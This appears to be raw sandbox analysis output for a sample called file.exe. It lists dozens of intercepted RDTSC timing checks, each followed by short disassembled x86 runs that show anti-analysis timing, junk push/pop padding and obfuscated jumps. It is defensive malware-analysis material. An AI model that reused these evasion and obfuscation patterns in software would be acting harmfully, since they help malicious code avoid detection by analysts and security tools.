Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC7800 second address: AF1945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 pop eax 0x00000007 jno 00007FC4E87CE382h 0x0000000d push dword ptr [ebp+122D1265h] 0x00000013 jng 00007FC4E87CE380h 0x00000019 pushad 0x0000001a movsx ecx, cx 0x0000001d add ax, 23ABh 0x00000022 popad 0x00000023 call dword ptr [ebp+122D3714h] 0x00000029 pushad 0x0000002a jnc 00007FC4E87CE377h 0x00000030 xor eax, eax 0x00000032 cmc 0x00000033 add dword ptr [ebp+122D306Ch], edi 0x00000039 mov edx, dword ptr [esp+28h] 0x0000003d mov dword ptr [ebp+122D306Ch], edx 0x00000043 je 00007FC4E87CE377h 0x00000049 clc 0x0000004a mov dword ptr [ebp+122D2D01h], eax 0x00000050 jmp 00007FC4E87CE383h 0x00000055 mov esi, 0000003Ch 0x0000005a stc 0x0000005b add esi, dword ptr [esp+24h] 0x0000005f jg 00007FC4E87CE37Ch 0x00000065 lodsw 0x00000067 jp 00007FC4E87CE37Ch 0x0000006d add eax, dword ptr [esp+24h] 0x00000071 jng 00007FC4E87CE384h 0x00000077 pushad 0x00000078 js 00007FC4E87CE376h 0x0000007e mov dword ptr [ebp+122D306Ch], ecx 0x00000084 popad 0x00000085 mov ebx, dword ptr [esp+24h] 0x00000089 sub dword ptr [ebp+122D35C6h], ebx 0x0000008f push eax 0x00000090 push eax 0x00000091 push edx 0x00000092 push eax 0x00000093 push edx 0x00000094 pushad 0x00000095 popad 0x00000096 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC9603 second address: CC9609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC9609 second address: CC960E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC960E second address: CC963F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4E9056F5Ch 0x00000007 jmp 00007FC4E9056F63h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jo 00007FC4E9056F6Ah 0x00000014 push eax 0x00000015 push edx 0x00000016 jo 00007FC4E9056F56h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5D231 second address: C5D236 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCE77F second address: CCE795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC4E9056F60h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCE795 second address: CCE7B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007FC4E87CE376h 0x0000000d jmp 00007FC4E87CE380h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCE7B2 second address: CCE7B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCE7B6 second address: CCE7D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC4E87CE37Eh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCF02C second address: CCF052 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FC4E9056F68h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCF1C5 second address: CCF1E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC4E87CE38Eh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCF367 second address: CCF375 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC4E9056F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCF375 second address: CCF379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD17F2 second address: CD17F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD17F8 second address: CD17FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD17FE second address: CD180B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD180B second address: CD1811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD1811 second address: CD1816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD1816 second address: CD1830 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC4E87CE385h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C52EE1 second address: C52EEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4E9056F5Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C52EEF second address: C52EF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C52EF8 second address: C52F37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC4E9056F56h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d push edi 0x0000000e jmp 00007FC4E9056F69h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC4E9056F66h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD75E8 second address: CD75FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FC4E87CE37Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD659C second address: CD65A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007FC4E9056F56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA4176 second address: CA417A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA417A second address: CA4188 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA467F second address: CA4691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC4E87CE37Dh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA4691 second address: CA46AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC4E9056F65h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA46AA second address: AF1945 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC4E87CE376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov dx, cx 0x00000010 push dword ptr [ebp+122D1265h] 0x00000016 call 00007FC4E87CE37Eh 0x0000001b mov edx, dword ptr [ebp+122D1BA1h] 0x00000021 pop ecx 0x00000022 call dword ptr [ebp+122D3714h] 0x00000028 pushad 0x00000029 jnc 00007FC4E87CE377h 0x0000002f xor eax, eax 0x00000031 cmc 0x00000032 add dword ptr [ebp+122D306Ch], edi 0x00000038 mov edx, dword ptr [esp+28h] 0x0000003c mov dword ptr [ebp+122D306Ch], edx 0x00000042 je 00007FC4E87CE377h 0x00000048 clc 0x00000049 mov dword ptr [ebp+122D2D01h], eax 0x0000004f jmp 00007FC4E87CE383h 0x00000054 mov esi, 0000003Ch 0x00000059 stc 0x0000005a add esi, dword ptr [esp+24h] 0x0000005e jg 00007FC4E87CE37Ch 0x00000064 lodsw 0x00000066 jp 00007FC4E87CE37Ch 0x0000006c add eax, dword ptr [esp+24h] 0x00000070 jng 00007FC4E87CE384h 0x00000076 pushad 0x00000077 js 00007FC4E87CE376h 0x0000007d mov dword ptr [ebp+122D306Ch], ecx 0x00000083 popad 0x00000084 mov ebx, dword ptr [esp+24h] 0x00000088 sub dword ptr [ebp+122D35C6h], ebx 0x0000008e push eax 0x0000008f push eax 0x00000090 push edx 0x00000091 push eax 0x00000092 push edx 0x00000093 pushad 0x00000094 popad 0x00000095 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA5486 second address: CA548A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA548A second address: CA54A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4E87CE387h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C857F0 second address: C8580C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC4E9056F68h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8580C second address: C85812 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C85812 second address: C85834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FC4E9056F5Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC4E9056F5Ah 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C85834 second address: C8584E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4E87CE386h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8584E second address: C85853 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C85853 second address: C85859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD6B8F second address: CD6B95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD6CF4 second address: CD6D14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007FC4E87CE383h 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD6E5B second address: CD6E5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD7099 second address: CD70B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a jbe 00007FC4E87CE378h 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD70B2 second address: CD70CC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jl 00007FC4E9056F56h 0x0000000f jnc 00007FC4E9056F56h 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDBCB2 second address: CDBCB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDC5C6 second address: CDC5CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDCB73 second address: CDCB90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 jmp 00007FC4E87CE381h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE229E second address: CE22A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE26BB second address: CE26DE instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC4E87CE38Bh 0x00000008 jnp 00007FC4E87CE376h 0x0000000e jmp 00007FC4E87CE37Fh 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push ecx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE2933 second address: CE295D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC4E9056F56h 0x00000008 jmp 00007FC4E9056F68h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007FC4E9056F56h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE295D second address: CE2967 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC4E87CE376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE2967 second address: CE2991 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4E9056F5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC4E9056F66h 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE2991 second address: CE2996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE2AC4 second address: CE2AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE2C35 second address: CE2C39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE2DA2 second address: CE2DA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE9A01 second address: CE9A05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE9A05 second address: CE9A1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4E9056F5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007FC4E9056F56h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEB9FA second address: CEBA0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC4E87CE380h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEBA0E second address: CEBA12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEEDF3 second address: CEEDF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEEDF7 second address: CEEE18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4E9056F5Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC4E9056F61h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF44A0 second address: CF44C8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC4E87CE376h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FC4E87CE387h 0x00000011 pushad 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA4ECD second address: CA4ED3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA4ED3 second address: CA4F50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4E87CE384h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007FC4E87CE378h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 mov dl, 9Fh 0x0000002a mov ebx, dword ptr [ebp+12485F94h] 0x00000030 mov cx, dx 0x00000033 add eax, ebx 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007FC4E87CE378h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 00000014h 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f jno 00007FC4E87CE379h 0x00000055 movzx edx, di 0x00000058 push eax 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c push esi 0x0000005d pop esi 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA4F50 second address: CA4F54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA4F54 second address: CA4F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF4845 second address: CF4879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC4E9056F56h 0x0000000a jne 00007FC4E9056F56h 0x00000010 popad 0x00000011 jg 00007FC4E9056F73h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF4879 second address: CF488E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC4E87CE381h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF53C5 second address: CF53CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF53CA second address: CF5404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC4E87CE37Ch 0x00000009 jnc 00007FC4E87CE376h 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FC4E87CE382h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d js 00007FC4E87CE384h 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF5404 second address: CF540A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFA39B second address: CFA3A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFA3A3 second address: CFA3AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFA3AB second address: CFA3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC4E87CE376h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFD331 second address: CFD33D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007FC4E9056F56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFCAA6 second address: CFCAAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFCAAA second address: CFCAD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4E9056F5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC4E9056F69h 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFCAD8 second address: CFCADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFCC2E second address: CFCC38 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC4E9056F5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFD069 second address: CFD073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D02B45 second address: D02B49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D02B49 second address: D02B5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FC4E87CE37Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D02B5D second address: D02B80 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC4E9056F67h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D02B80 second address: D02BAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007FC4E87CE376h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jc 00007FC4E87CE392h 0x00000014 jp 00007FC4E87CE38Ch 0x0000001a jmp 00007FC4E87CE380h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D02E56 second address: D02E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FC4E9056F5Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007FC4E9056F56h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D02E71 second address: D02E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D02E75 second address: D02E7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D02E7F second address: D02E83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D02E83 second address: D02E87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D02E87 second address: D02E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jp 00007FC4E87CE376h 0x00000013 rdtsc
